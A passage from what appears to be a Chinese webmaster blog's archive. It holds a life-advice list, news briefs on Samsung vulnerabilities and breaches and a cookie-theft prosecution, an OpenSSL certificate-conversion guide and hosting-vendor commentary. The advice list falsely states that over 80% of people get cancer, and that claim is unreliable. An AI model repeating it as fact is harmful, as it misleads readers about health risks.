值,没有人可以随便成功,降低预期能让自己好过不少,至少在你失败的时候能够舒服一点,小的时候认为自己是最牛逼的,自己能够改变世界,长大世界的现实是残酷的,没有什么鸡汤,奇迹是不会发生在你身上,学会接受失败和面对现实。我一以前认识的大佬,做到上市公司的高管了,这几年自己创业,凡事亲力亲为,用电话陌拜谈业务,对方三秒钟就挂了,他把这个事情发在了朋友圈,很难想象原来这样的大佬也需要自己这么去干。多问问自己凭什么是你?五、恋爱要参照最优停止理论,也就是说,前37%的人如果都不合适,那么之后的每一个只要比前37%的要好,那么果断的去结婚,爱情是有情饮水饱,真正的婚姻是门当户对,家庭合伙制是婚姻的本质,一定要选性格好的,性格好的女人比有钱、漂亮之类优势更加明显。六、不要和老板做朋友,很多时候打工的思维在于拼命的把事情做对,而老板更多的是做对的事情,所以在层次和思维上是不可能成为朋友的,跟老板称兄道弟那就犯了大忌,表面越好,后面撕逼的结果就更严重。开始很美丽,结束的没道理。七、不要裸辞,一不爽就裸辞,会让自己的生活陷入一片慌乱,而后面的日子会越来越难过,辞职的前提一定是你学习不到任何东西了,没有任何成长,公司很垃圾,否则万不得已,必须要找到下一份工作再考虑辞职。八、少买知识付费的课程,市面上99%以上的课程本质上都是垃圾,对你没有任何好处,所有的方法论和成功方式都不适合你,基本连可应用的场景都没有,知识付费本质上是在贩卖焦虑,收智商税,省下的钱不如加入一些优质的社群,重复读几本经典的书并做总结来的划算。九、买保险,重要的事情要想三遍,保险不是骗子,保险是你人生变故后的最后一根救命稻草,是人生规划中必不可少的环节,如果你的经济实力不是特别的好,一定要买保险特别是重疾险,买消费型不买分红型,如果是家庭一定要给家庭中经济实力最强的人以及家庭的老人买好保险,人的一生中80%以上的概率都会得癌症。十、练习写作,好的文笔比好的数学重要多了,数学本质上来讲学到高中基本可以用来闯荡社会,你想想你这些年的数学丢到哪去了,数学老师的棺材板压不住了。而写作是人生的必修课,而且每个人都需要写作,工作中你写的总结,计划,报告,邮件,微信等等都是写作,好的文笔能让你有更多的收入可能,说改变人生都不算夸张,见过很多原本普通的人,靠写作最后财富自由。十一、学习一项特长,你回头想想,你最牛逼的技能是什么?搜肠刮肚都想不到的时候,那么真的要趁早开始刻意练习了,在竞争领域,垂直擅长的领域,你的特长能够让你保持足够的竞争力和优势。而且不觉得有特长的人特别的酷吗?十二、及时止损,很多事都需要成本代价,很多事没有任何的必要,及时止损的思维是为了不陷入损失黑洞陷阱,不一错再错,捡了西瓜丢了芝麻,错了就错了,失败了就是失败了,及时抽离。十三、明白人生而孤独,孤独的人并不可耻,每个人都是孤独的,享受孤独,人不能真正的去理解另外一个人,能明白自己的只有自己。十四、培养独立思考能力,在当下信息泛滥的时代,拥有独立思考的能力极其重要,做事之前多想想,事情真相是什么?为什么是这样?为什么不是这样?还有什么其他可能性吗?多种的思维方式去考虑问题,别让你的脑子成为别人的跑马场。十五、锻炼身体,好的身体绝对是本钱,高手的对决中,笑到最后的是看谁身体好,能够把对方熬败,好的身体是一种稀缺的资源,职场上更加如此,拼实力以外更多的是拼精力和体力,你想想再不锻炼能拼的过90后00后吗?你还能通宵吗?十六、尽量选择买贵的东西,为什么这么说,其实《断舍离》的本质,除了让我们明白人和物品的关系以外,更重要的是,物品是有能量的,如果你享受不了贵的物品,本质上是你内心觉得配不上这个物品,贵的东西能让你更加的自信,吸引力法则,你敢买宝马3以后一定买的起保时捷卡宴。其他东西同理。十七、学会演讲,无论在哪种场合我们需要演讲,开会发言,谈话,谈判,社交等都是演讲,生活中高频接触使用的技能一定要多训练。开不了口,害羞,害怕,会让自己人生丢分不少。十八、有条件就选择创业,其实是趁年轻多去折腾,多去试错才能知道自己究竟适合哪个方向,创业是改变限制条件,选择别人,而不是被人选择,做制定游戏规则的人。当然,如果错了没关系,大不了还可以回头,到了四十岁,上有老下有小,车贷房贷,那真正是把人生困死,动不了,想都不敢想。十九、学会和自己相处,和自己内心的小宇宙相处,不执拗,不纠结,不自责,远离颠倒梦想,找到自己才能找到世界,千万不要和自己过不去。二十、自信,盲目的自信这也是自信,自信能让自己获得更多的资源和快感,自卑会让自己失去很多机会,自信让人进步,自卑让人退步。作者:木木酱的小江湖 #### 三星 Exynos 芯片现高危漏洞 10 月 30 日消息,三星电子本月发出警告,称许多搭载 Exynos 处理器的 Galaxy 智能手机和平板电脑存在高风险漏洞,可能被黑客利用。公司敦促用户尽快更新到最新的安全补丁,并正在积极解决该漏洞。 受影响的 Exynos 处理器型号包括: 9820 9825 980 990 850 W920 受影响的设备包括: Galaxy S20 系列 Galaxy Note 20 系列 Galaxy S10 系列 Galaxy Note 10 系列 Galaxy A21 Galaxy A51 Galaxy A71 Galaxy Watch 5 Galaxy Watch FE Galaxy Watch 4 自漏洞首次被发现已近一个月,三星终于开始推出安全更新以修复该漏洞。 该漏洞的严重性在于其允许恶意攻击者获取系统权限并在设备上运行恶意代码。攻击者甚至可以伪装成三星系统进程,躲避系统扫描。 一旦黑客成功利用该漏洞,他们可以访问用户的个人信息,如银行账户详细信息,甚至可以窥探用户的私人对话和照片。 谷歌专家称,他们已经发现有黑客利用该漏洞在不知情的用户设备上执行恶意代码。但目前尚未透露这些攻击的规模、性质或攻击者的身份。 建议用户尽快更新设备系统,并避免从不明来源下载应用或点击可疑链接。 #### 三星遭遇网络攻击,美国用户部分信息受损 9 月 3 日消息,如果你是三星美国用户,那么你可能需要检查自己是否涉及到信息泄露的问题。 据了解到,三星在其支持页面上宣布,其位于美国的系统遭遇了网络安全攻击。据三星称,7 月下旬,一个未经授权的第三方设法获取了该公司部分客户的个人信息。 尽管三星一再表示“没有任何社会安全号码、信用卡号码或借记卡号码被泄露”,但确实涉及到一些用户信息的细节,不过受影响的信息可能因个人而异。三星表示,第三方可能窃取了客户的姓名、联系方式和人口信息、出生日期和产品注册信息等数据。 至于该公司如何应对数据泄露事件,三星表示,他们正在与被确认受到攻击的客户进行沟通。目前,该公司声称没有必要立即采取行动,但警告用户有必要保持警惕,对于要求提供个人信息的可疑信息的电话或网站提起警戒。 #### 上市公司涉窃取30亿条个人资料 非法牟利超千万被抓 浙江绍兴市的多位市民近期发现,自己的微博、微信等社交账号几乎每天都会“自动”加粉或关注他人,且不时收到各种垃圾广告短信。这种情况持续数月后,他们怀疑个人信息被泄漏,陆续选择报警。8月20日,澎湃新闻从绍兴市越城区公安分局获悉,该局日前侦破一起特大流量劫持案,涉案的新三板挂牌公司北京瑞智华胜科技股份有限公司,涉嫌非法窃取用户个人信息30亿条,涉及百度、腾讯、阿里、京东等全国96家互联网公司产品,目前警方已从该公司及其关联公司抓获6名犯罪嫌疑人。案件仍在进一步侦办中。2018年7月3日,浙江绍兴越城警方在北京海淀区瑞智华胜公司抓捕犯罪嫌疑人,技术人员进行现场取证。新三板上市公司涉盗取个人信息6月起,绍兴市越城区公安分局网警大队陆续接李先生、张先生、董先生等多位市民陆续报案称,他们的手机几乎每天都会在毫不知情的情况下添加不同的微博好友及关注各种微信公众号,每次取消关注后,又会再度“自动”添加,怀疑个人信息已泄漏并被人盗取。同一时段,越城区公安分局网警大队也接到阿里巴巴安全专案团队提供的线索,称有绍兴地区淘宝用户反映其账号有异常添加陌生人的情况,疑似个人信息遭泄漏。“在阿里巴巴集团安全部门的协助下,我们通过技术手段发现,李先生的手机近期频繁被外地陌生IP地址访问。经反向侦查、层层穿透,最终锁定8个IP经常对李某手机进行操控使用,而该IP段实际使用者为北京中科云智信息技术有限公司。”越城区公安分局网警大队大队长张野平告诉澎湃新闻。侦查发现,北京中科云智公司与北京点智互动信息技术有限公司、北京瑞智华胜公司为关联公司,三公司实际在同一地点办公,主要成员也均相同且交叉任职。点智互动、中科云智两家公司主要与运营商进行正规流量合作,合作过程中他们会加入非法软件用于清洗流量、获取用户的cookie等。瑞智华胜公司利用非法窃取的用户信息,用于互联网营销获利变现。其中,瑞智华胜公司为新三板挂牌公司,证券代码:872382。7月3日,绍兴警方在属地警方的配合下,前往北京瑞智华胜公司办公的北京市海淀区某大厦,对涉案人员实施抓捕。目前已从该公司及其关联公司抓获周某、梁某等6名犯罪嫌疑人,但主犯邢某已逃至海外。8月13日,北京瑞智华胜公司发布公告称,2018年7月,公司法定代表人、董事周嘉林及监事黄健、梁修军等人因涉嫌非法获取计算机信息系统数据罪被越城区公安分局刑事拘留,黄健、梁修军于2018年8月9日已被越城区人民检察院批捕,周嘉林已取保候审,案件尚待公安机关进一步调查。为配合公安机关调查,公司基本存款户已被冻结。非法操控公众账号加粉或关注公开资料显示,北京瑞智华胜公司是一家互联网新媒体营销解决方案提供商,成立于2013年5月,最初经营技术开发、技术转让等业务。2016年起转型做自媒体等互联网营销,2017年12月1日在新三板挂牌。财务数据显示,转型后该公司业绩飞涨。2015年,其营收为187万元,净利润2万元。2016年转型后当年实现营收3028万元,净利润1053万元。瑞智华胜公司2016年的“成功”转型,缘于该案主犯邢某的加入。邢某原是一家从事缓存业务互联网公司的高管,2016年他带领前公司多名技术人员一起到了北京点智互动公司,开展互联网营销业务。该公司资料显示,其管理运营80余个自媒体账号,主要运营20个微博账号和55个微信公众号,内容涉及旅游、资讯、美食、健身等多个领域,拥有的总粉丝数量超7000万。其官网显示,公司主要的新浪微博账号包括“踏马行者”“鲜衣美食君”“女神小课堂”等,不少账号粉丝数超过百万,其主要微信公众号有“娱姐来了”“松子电影”“鲜衣美食君”等,有不少账号进入“新榜”排名百强,且每天都在创造10W+。该公司曾为联想、酷派、雀巢、佳能、天猫、京东、携程、美图手机等众多知名企业提供过产品营销服务。警方提供的资料显示,北京瑞智华胜公司大部分微博、微信公众号账号都在2016年1月以后注册,粉丝数在十几万至几百万不等,单个账号粉丝最多的有600多万,根据粉丝数不同,承接的单条广告费用在数千元至上万元不等。如“娱姐来了”微信公号,头条广告发布费用为2.18万元,次条为1.8万元。“该公司自营微博和微信公号的粉丝、关注中,很大一部分是在用户未知的情况下,账号被非法操控后强行加粉或关注的,其中今年1月24日单日加粉数达到109万。针对不同的社交平台软件,该公司研发了不同用户信息提取、操控程序用于加粉。”办案民警单钟颖告诉澎湃新闻,北京瑞智华胜公司及其关联公司在与正规运营商合作中,会加入一些非法软件用于清洗流量、获取用户的cookie。cookie是用户在运营商上留存的上网记录,通过技术手段可以从中提取公民个人信息、相关账号密码、搜索的关键词等内容。被盗30亿条信息部分存储在海外澎湃新闻从越城区公安分局获悉,目前已查实北京瑞智华胜公司非法获取的数据涉及腾讯、百度、阿里、新浪和今日头条等全国96家互联网公司产品,几乎涵盖了国内核心的互联网企业。其非法获取的数据来源包括电信、移动、联通、铁通、广电等11个省市的运营商,这些运营商均与涉案公司签署过合作协议。“他们先和运营商签订正规合同、拿到登录凭证,然后将非法程序置入用于自动采集用户cookie、手机号等信息。他们劫持数据后会进行爬取、还原等,为了不被发现,他们专门购买了3万多个IP地址用于频繁爬取。”办案民警单钟颖告诉澎湃新闻,警方梳理北京瑞智华胜公司签订过的合同发现,其不但给自己运营账号加粉,还承接外来加粉、加关注和提升百度搜词排名等业务。从目前掌握情况来看,该公司有数十家推广、加粉等业务合作的下游合作商,涉及北京、杭州、福州、深圳、临汾、东莞、厦门、上海、广州、成都等地。越城区公安分局网警大队大队长张野平向澎湃新闻介绍,该案已发现犯罪嫌疑人窃取的cookie等信息30亿条,涉案公司将这些cookie信息窃取后分别存储在境内和境外的服务器上。警方表示,犯罪嫌疑人未经公民同意而非法收集个人信息并进行精准营销的行为,不仅对用户构成民事侵权,还涉嫌构成侵犯公民个人信息罪。这些个人信息被非法收集或者提供给第三方后,也可能被用于其他非法活动,比如根据盗取的身份证号、手机号等个人信息去盗取用户的网银账户等,进而可能会给用户带来财产损失。此外,他们把非法收集的大量公民个人信息存储在境外的服务器上,有被境外的组织机构或者个人利用、进而危害国安安全的风险。 #### 上海极目银河倒闭了:老板欠 62 亿元跑路,数百人原地失业 5 月 31 日消息,近日有网友在脉脉发文称,上海极目银河数字科技公司(极目银河)遭遇了财务危机,公司老板已失联,数百员工工资数月未发,累计亏损高达 62 亿人民币。 一封报警回执近日在社交媒体上快速传播,报案内容为寻找上海市极目未来园老板陈群。据读特新闻 5 月 29 日报道,员工于 5 月 27 日收到“老板跑路,公司破产”通知,欠薪情况属实,目前正在集体劳动仲裁维权中。 有员工向南方都市报透露,上海南蕰藻路 819、869 号极目未来园上的招牌已在拆除。另有极目科技员工声称已实名报警,赶到公司老板所在的别墅寻人时,现场已人去楼空,仅留有一张 A4 打印纸和一个 U 盘。该打印纸上写明,该公司老板因无法兑付投资人的钱合计 62 亿元,最终只能选择逃避。 公开信息显示,上海极目银河数字科技有限公司成立于 2023 年 2 月,是一家以从事软件和信息技术服务业为主的企业,企业注册资本 7861 万人民币,法定代表人是陈某。 该公司官方渠道信息显示,极目银河是一家多元化的科技集团,旗下拥有十余家科技子公司和控股公司,业务遍布中国和全球 40 余个城市,拥有超过 1000 名员工,其中 800 多名是高水平的研发人员。 目前该公司网站已出现错误无法进入。 有趣的是,该公司微信公众号“极目人”在 5 月 24 日还发布了一条新员工培训的推文,也就是“欠薪跑路”事件 3 天前,这也太突然了。 #### 上海网信办启动生态治理专项行动 处置违规账号超15万 4月15日 消息:今日,上海市互联网信息办公室官方微信公号“网信上海”发文称,根据国家网信办统一部署,上海市网信办启动本市网络生态治理专项行动,重点对属地内各类网站、移动应用程序、自媒体公号、论坛、贴吧等重点环节中的负面有害信息进行整治。 围绕本市网络游戏、网络文学、自媒体、网址导航和聚合平台等重点领域,上海市网信办会同市“扫黄打非”办、市公安局、市通管局、市新闻出版局、市市场监管局、市文化市场行政执法总队等部门开展专项整治。 截至 3 月底,上海市网信办共指导属地内网站平台查删拦截有害信息72. 8 万余条,处置违法违规账号15. 7 万余个,应用商店自查并下架“氧气”“海淘一号”等违规应用程序 92 个。上海市网信办约谈宽带山、八达网等网站 15 家,协调相关部门注销“魔都八卦女”“上交所科创板”等 8 个微博、微信公众账号,注销网站备案 84 家,关闭网站 10 家。 #### 上线两年多,网易知识公路平台要停运啦 7月15日 消息:近日,网易知识公路平台宣布即将停止运营。根据公司业务调整的需要,该平台将于2023年7月27日00:00正式关闭,为这段旅程画上句号。 据公告透露,自7月13日起,网易知识公路已停止新用户注册和视频内容上传。而从7月27日起,网易知识公路将全面停止运营,网站将无法登录,并且储存在网站上的视频内容也将被下架和清空。不过,在停运之前,平台已为仍未提现的创作家和MCN机构提供了提现入口。 对于希望继续在网易产品上发布和传播创作内容的用户,官方表示可以选择使用网易知识公路的注册账号信息登录网易号媒体开放平台来继续发布创作内容。 早在2020年12月,网易就推出了知识短视频内容消费品牌网易新闻“知识公路”,随后又申请多个“知识公路”商标。可惜在运营两年多后,网易知识公路并未取得成功,以平台下线收场。 #### 下手真快!Facebook刚推出的新闻网站 Bulletin.com就被封了 6月30日消息:据TheVerge报道,社交网络巨头 Facebook 本周二宣布推出新闻资讯订阅产品 Bulletin,同时上线Bulletin.com,它是一个独立平台,里面有免费、付费文章及播客,直接竞争对手是 Substack。 Bulletin允许作者发布免费和付费的电子邮件通讯,这些通讯可以发布到网上,也发送到订阅者的收件箱,并在Facebook上分享。Facebook 宣称在 Bulletin 推出之初不会从创作者手中获取分成,创作者可以自己确定付费订阅价格。另外,Bulletin 的文章和播客也可以通过 Facebook News Feed、Facebook News 获取。 Facebook 表示:「我们打造的 Bulletin 是一个独立网站,如此一来创作者不完全依赖 Facebook 平台就能获取观众。」 不过可惜,刚推出来就被国内给封了,众所周知,国外新闻网站一向喜欢报中国内的各种不好,甚至造谣,被封是迟早的事,只是没想到国家防火墙这么给力,刚上线就被封了,手段还是DNS污染。 #### 下月起多地未备案App、小程序将下架关停! 根据最新消息,从2024年4月1日开始,国内多个地方将对未备案的移动互联网应用程序(包括App、小程序、快应用等)执行下架、关停、限制更新等处理措施。这些措施是为了进一步促进互联网行业的规范健康发展。 在2023年8月发布的《工业和信息化部关于开展移动互联网应用程序备案工作的通知》中,预留了10个月的时间作为App备案工作的过渡期。在这个期间内,已经开展业务的App需要向其住所所在地的省级通信管理局履行备案手续。 对于那些在2024年4月1日前还未履行备案手续的App,将会受到相应的处罚。例如,网络接入服务提供者、应用分发平台、智能终端生产企业不得为未履行备案手续的App提供网络接入、分发、预置等服务。 因此,如果你是一名App或小程序的开发者,建议你在规定时间内完成备案手续,以免你的产品被下架或关停。如果你是一名普通用户,也请注意关注你经常使用的App或小程序是否完成了备案,避免对你的使用造成影响。 #### 下载网站被起诉侵权,索赔50万! 有做下载站的同学注意啦,你的网站可能不知不觉已经侵权了! 一位站长因为几年前做的下载站被告了,对方索赔50万+诉讼成本。 近年来侵权诉讼案时长发生,各种图片、软件、文学等都存在侵权的可能,很可能被人利用索要巨额赔偿,站长们注意啦,一定要做好版权安全防范,勿转载使用互联网上未经授权的东西,有可能是人家钓鱼执法。 #### 不买域名了?小米汽车备案xiaomiev.com用作官网 8 月 23 日消息,工信部 ICP / IP 地址 / 域名信息备案管理系统显示,小米汽车科技有限公司于 8 月 2 日备案了 xiaomiev.com 网站域名。备案号为京ICP备2023017139号-1 从名称来看,这一域名或用作小米汽车的官网网址。 主机吧查了下,这个主体备案号只备了一个域名,说明用这个域名来做官网的概率还真不低。 不过按照小米官网的命名规则,小米 IoT 开发者平台是 iot.mi.com、小爱同学是 xiaoai.mi.com,小米汽车按常规预计是 ev.mi.com,因此不排除 xiaomiev.com 是作为保护性注册的可能。 如果用xiaomiev.com来作官网的话,有点降逼格,如果用mi.com二级域名来作官网的话显得小米汽车不够独立,在主机吧看来,买miev.com才是最佳选择。 #### 不再推荐华夏名网虚拟主机产品 说起华夏名网,这家公司真的是让主机吧又爱又恨,爱的是主机吧刚开始做代理业务的时候就是代理华夏名网的,当时华夏名网的主机非常受欢迎,空间又大价格又便宜。 恨的是,这家公司现在逐渐没落了,香港虚拟主机甚至经常出现故障,稳定性没办法保证。新出的产品代理景安的了,作为华夏名网资深代理,也无法享受代理优惠价。 刚接触网站业没多久,主机吧的第二主机就是用华夏名网的,记得第一个主机是用安徽傲龙的,当时200多块一年的主机,也是相当贵,而且空间还小,速度打开也相当慢。 后来通过百度搜索一番对比后,找到了华夏名网,用的是华夏名网自由1型 双线1G空间2G数据库,用了一半年后非常稳定。于是就有代理他们主机卖的相法, 从此以后主机吧就走上了代理的道路,这期间代理有华夏名网、西部数码、景安、万网(后台因业绩不达标被清退了)、北京电信通(很烂,没售后)、广州新一代、耐思尼克等服务商,除西部数码产品稍微做得起色点,其它服务商要么是产品性价比低,要么售后烂,都只能轮为当华夏名网没有产品满足客户时,我才会推荐他们买别的公司。 慢慢的很多站长非常信任主机吧,因为找主机吧咨询的,基本都可以找到合适的产品,而且各家公司的优点缺点主机吧都跟他们先说清楚。同时主机吧也主要推荐华夏名网产品,当时华夏名网的产品确实要价格有价格,要质量有质量,要售后有售后。 但这两年主机吧发现,华夏名网的产品越做越烂,产品越做越小,先后关闭了广东、四川机机房的虚拟主机,价格也一直没变过,香港空间也故障率奇高。而且云服务器一直搞不起来,甚至到现在似乎放弃了自家产品,转而直接代理景安的。 代理也不在享受优惠价格,同等官方一个价,这对于主机吧来说是不能接受的,如果没有折扣,那主机吧为何要卖你们产品呢? 而且这几年华夏名网的虚拟主机型号简直一年一变,在客户不知情的情况下,更改了型号,并下线了原有型号,导致很多客户续费价格提高了。咨询官方说是升级型号,这个升级说得太高大,其实就是换产品了。一般升级主机都是在原有主机的基础下升级,而华夏名网的升级是配置不变,价格反而升级,只是换个名称。这让我无法忍受,因为当你产品卖到一定销量的时候,你发现这个产品下线了,很恶心。找华夏名网负责人他们总是一直敷衍。 最后,实在无法忍受这种不把客户,不把代理当回事服务商,果断不在推荐华夏名网产品,转投西部数码产品,西部数码产品现在性价比比华夏名网高得多,而且售后好,资源多。只是很多客户之前已经在华夏名网买了好多主机,只能慢慢转来,想想都头疼……如果当初没有主推华夏名网的产品就好了,一家没落的服务商,就跟一个老房子似的,虽然可以住人,但看着都有点害怕。同时主机吧也新代理了美橙互联的产品,这家公司主机注意很久,产品资源丰富,一样提供24小时售后(相比华夏名网晚上11点后没人了),非常值得推荐,期待为客户提供最好的服务。 #### 不再特别!Chrome和Firefox浏览器将在地址栏去掉EV证书信息 8月16日 消息:据computerworld消息,谷歌和Mozilla已经决定在Chrome和Firefox浏览器取消展示扩展验证(EV)证书,该证书主要向用户提示其登录的是合法的官方网站,而不是恶意的钓鱼网站。 与普通证书不同的是,EV证书只能由一特定的证书颁发机构(CAs)颁发,一家公司必须经历复杂的验证过程以证明其为某一网站合法所有者。 EV背后的想法是让网络用户明确他们进入了合规官方网站,而不是由其诈骗公司提供的恶意钓鱼链接。浏览器一般会在地址栏域名前面用绿色的字体来提示进入经过验证的合法网站EV证书企业信息。 谷歌和Mozilla现在认为,没有必要在浏览器的地址栏特别展示EV证书信息。谷歌对外表示,经过Chrome Security UX (用户体验团队)调查发现,EV无法再按预期保护用户。此外,EV证书信息还会占用浏览器地址栏宝贵的空间。 据悉,今年 10 月份,火狐将停止在地址栏位置显示网站EV信息。而将于 9 月 10 日发布Chrome77 的也会在地址栏删除证书信息。之后。Mozilla和Google都会将EV证书信息移到挂锁图标后面,用户可以点击该图标查看证书信息。 据悉,Firefox70 版本将于 10 月 22 日正式推出。Mozilla认为,这种调整旨在减少EV信息的曝光,同时使其易于访问。 由于占用空间的问题,移动浏览器通常不会在地址栏展示EV证书企业信息。比如iOS  Safari 浏览器就移除了 EV 证书的企业名称。 #### 不同格式的HTTPS证书转换成PEM格式 概述 PEM格式的证书文件(*.pem)由Base64编码的二进制内容和开头行(——-BEGIN CERTIFICATE——-)、结束行(——-END CERTIFICATE——-)组成,支持使用EditPlus等文本编辑器打开。本文介绍将不同格式的HTTPS证书转换为PEM格式的方法。 详细信息 CER或CRT格式证书转换为PEM格式 对于CER或CRT格式的证书,您可通过直接修改证书文件扩展名的方式,将其转换成PEM格式。例如,将server.crt证书文件重命名为server.pem即可。 PFX格式证书转换为PEM格式 PFX格式的证书一般出现在Windows Server服务器中,您可通过OpenSSL工具进行转换。通过执行以下两条OpenSSL命令,将PFX格式证书转换成PEM格式证书。 只提取私钥文件的命令:openssl pkcs12 -in [$Cert_Name.pfx] -nocerts -out key.pem -nodes 说明: [$Ccert_Name.pfx]为需要转换的PFX格式证书。 key.pem为提取的私钥文件。 只提取公钥证书的命令:openssl pkcs12 -in [$Cert_Name.pfx] -nokeys -out cert.pem 说明: cert.pem为提取的公钥文件。 提取公钥和私钥合并文件的命令:openssl pkcs12 -in [$Cert_Name.pfx] -nodes -out all.pem P7B格式证书转换为PEM格式 P7B格式证书一般出现在Windows Server和Tomcat服务器中,您可通过OpenSSL工具进行转换。参考以下步骤,将P7B格式证书转化为PEM格式证书。 执行以下命令,将P7B格式证书文件转换为CER格式文件。 openssl pkcs7 -print_certs -in [$Incertificat.p7b] -out [$Outcertificate.cer] 说明: [$Incertificat.p7b]为需要转换的P7B格式证书。 [$Outcertificate.cer]为转换后的PEM格式证书。 只保留CER文件中以“——-BEGIN CERTIFICATE——-”开头,以“——-END CERTIFICATE——-”结尾的证书内容,如下所示。 -----BEGIN CERTIFICATE----- MIIE5zCCA8+gAwIBAgIQN+whYc2BgzAogau0dc3PtzANBgkqh...... -----END CERTIFICATE----- 将CER文件的扩展名改为.pem即可。 DER格式证书转换为PEM格式 DER格式证书一般出现在Java平台中,您可使用OpenSSL工具将其转化为PEM格式。通过执行以下两条OpenSSL命令,DER格式证书转换为PEM格式。 只提取公钥文件的命令:openssl x509 -inform der -in certificate.der -out certificate.pem 说明:certificate.der为DER格式的证书,certificate.pem为转换后的PEM格式证书。具体文件以实际环境为准。 只提取私钥文件的命令:openssl rsa -inform DER -outform PEM -in privatekey.der -out privatekey.pem 说明:privatekey.der为DER格式的证书,privatekey.pem为转换后的PEM格式证书。具体文件以实际环境为准。 #### 不管黑客用了多少跳板,最终是不是可以通过网络运营商找出真实 IP对吗? 理论上,网络运营商确实有能力通过一系列的技术手段尝试找出黑客的真实IP地址,但这需要一定的技术和资源投入。 首先,网络运营商可以通过分析网络流量日志,查看数据包的来源和去向,从而追踪数据流的路径。如果黑客使用的跳板足够多,这种方法可能会变得非常困难。 其次,网络运营商也可以通过检查数据包的内容,寻找可能的线索。例如,数据包中可能包含一些关于源IP地址的信息,或者黑客可能不小心在数据包中留下了某些痕迹。 最后,网络运营商还可以通过与其他运营商合作,共享信息,共同追踪黑客。这种方法需要良好的协作机制和信任关系。 然而,这些方法都需要大量的资源和时间,而且不一定能够成功。因此,虽然网络运营商理论上可以找出黑客的真实IP地址,但在实际情况中,这可能并不容易实现。 #### 不能使用华为云 要求网站内容与企业经营范围一致? 最近,在站长论坛有站长反馈,在使用华为云服务器的时候,被华为云要求网站的内容必须与企业营业执照经营范围一致。 本人是华为忠实用户,手机电脑均是多年用户,所以想着本次做几个网站就用华为云服务器,顺便帮助一下华为渡过难关~未曾想,华为云好歹是国内第二第三云服务器提供商了,也有属于自己的霸王条款,日前他们客服联系我说我旗下几个网站经营范围跟我个体户营业执照上的经营范围不一致,叫我整改,否则取消BA。我在电话里面数次质疑他们这是属于他们的一家之言,自己在阿里云、腾讯云等有其他内容相同类型网站,为什么其他服务商均没有此类要求,如果要经营范围与网站内容一致,那么我百货类营业执照只能运营百货类网站?这不扯淡吗?我又说这是工信部哪一条规定,我做网站十几年,还是第一次听说这样的规定,要是有这样的规定,那多少公司营业执照经营范围能跟自己的网站运营内容方向一致的,营业执照上面才几行字?然后他们就不说话了,就说这不是工信部要求,只是他们安全部所谓的系统检测然后要求整改,我说你们这个安全系统不是纯粹给客户找麻烦吗,如果是内容出现违规,或者我BA主体真实性存在任何问题,我都是二话不说配合整改的哈,你这个内容跟我们营业执照经营范围一致,你用你们自己的要求去增加客户成本,造成客户损失?然后就开始人机复读模式了,也讲不出任何道理,这样的服务商,站长能用?工信部什么时候要求主体不能线上跨领域运营了?奉劝再三,别用华为云,我们网站刚运营起步,眼看权二权三了几个网站,这一折腾,又没有了 https://www.4414.cn/thread-130610-1-1.html 这里主机吧经亲身经历告诉站长,工信部确实要求网站内容必须与企业经营范围一致,不只华为云要求,百度云、阿里云、腾讯云都有这个要求,主机吧就曾被阿里云电话联系整改过,这并不是华为故意刁难的。 #### 不解决网络攻击问题,把被攻击的人解决了,澳大利亚拟立法禁止向黑客付赎金 11 月 14 日消息,据路透社报道,澳大利亚内政部长克莱尔-奥尼尔 (Clare O'Neil) 周日表示,在最近影响到数百万澳大利亚人的网络攻击之后,政府将考虑把向网络黑客支付赎金的行为定为非法行为。 澳大利亚最大的健康保险公司 Medibank Private Ltd 上个月遭受了大规模的网络攻击,此外,包括澳大利亚第二大电信运营商 Optus 在内的 9 家公司的网络被黑。澳大利亚最大的医疗保险公司 Medibank 上个月也遭受大规模网络攻击,约 1000 万客户的数据被泄露。 周日在 ABC 电视台被问及政府是否计划研究将向网络犯罪分子支付赎金列为非法行为时,奥尼尔说“这是正确的”,她说:“我们将在网络战略的背景下做到这一点。” 奥尼尔表示,网络安全改革需要短期效果,同时也要考虑长远成果。政府正在研究是否需要新的法律条款来阻止公司在数据泄露后向黑客支付赎金,被黑公司支付赎金的行为可能很快会被列为非法行为。 目前,澳政府已经在澳大利亚联邦警察(AFP)和澳大利亚信号局(负责拦截来自外国的电子通信)之间建立了新的网络警务模式,以对网络犯罪进行“新的严厉监管”。据悉,将有约 100 名警员加入。 #### 不限速下载+磁力离线神器 黑科云将于12月1日关闭 互联网的老司机又要痛失一个阵地了,黑科云日前突然宣布将在12月1日关闭,用户云空间的所有文件将被清仓,大家要提前下载到本地了。 黑科云的前身叫做萝莉云,它也是一个在线网盘,支持各种磁力、BT离线下载,而且不限速,本质上更像是一个完全体的百度网盘,免费版有次数限制,收费版价格也比较便宜,吸引了不少用户,大部分还是很低调的。 黑科云的官网介绍很简单,不过他们的客户端功能可不少,根据网络介绍,具体如下: 【软件特色】 1、极速下载脱胎换骨:今后速度、容量、流量都不再是问题,黑科用户畅享一切。 2、更全面的下载协议支持:比以往更多的下载协议支持,并且提供黑科独有的加速服务。 3、极速预览:高清视频也可以在软件中就开始预览,与在线视频一样方便。 4、更轻快,依然无广告:多年专注下载服务,无论互联网怎样变,对洁净的执着不变。 5、几乎与所有系统兼容:黑科可以在几乎所有的系统中运行,包括IOS苹果端。 6、随处可用的收藏空间:随时各个客户端访问收藏空间,即可极速预览与下载。 7、视频和音频文件排序功能,按日期、大小、名称,任您选。 8、搜索过滤功能,视频、音频直接播放。 9、收藏功能,喜欢的视频文件不用再去一个一个查找。 10、播放记忆功能,看过的,没看的,一目了然。 官方并没有给出关闭的原因,不过在线网盘的日子都不好过,运营成本是个极大的负担,百度网盘拥有上亿用户也没能弥补亏损,小型服务商更难成本了。 且行且珍惜,黑科云中还有重要文件的早点下载回本地吧,重要数据多地备份是关键,任何网盘都不可能100%永久可靠。 #### 世界上使用量最大的数据库引擎 SQLite 3.33.0 发布 SQLite 3.33.0 发布了,SQLite 是一个 C 实现的 SQL 数据库引擎,它的特点是小型、快速、自包含、高可靠性和功能齐全。SQLite 嵌入在所有手机和大多数计算机中,也捆绑在为数众多的其它应用中,是世界上使用量最大的数据库引擎。 此版本更新内容包括: 1.支持遵循 PostgreSQL 语法的 UPDATE FROM: UPDATE-FROM 的想法是对 SQL 的扩展,它允许 UPDATE 语句由数据库中的其他表驱动。使用 UPDATE-FROM,可以将目标表与数据库中的其他表连接起来,以帮助计算需要更新的行以及这些行上的新值。 2.将数据库文件的最大大小增加到 281 TB。 3.扩展了 PRAGMA integrity_check 语句,以便可以选择将其限制为仅验证单个表及其索引,而不是验证整个数据库文件。 4.添加了用于执行任意精度十进制算术的十进制扩展名。 5.增强 ieee754 扩展,以使用 IEEE 754 binary64 数字。 6.CLI 增强功能: 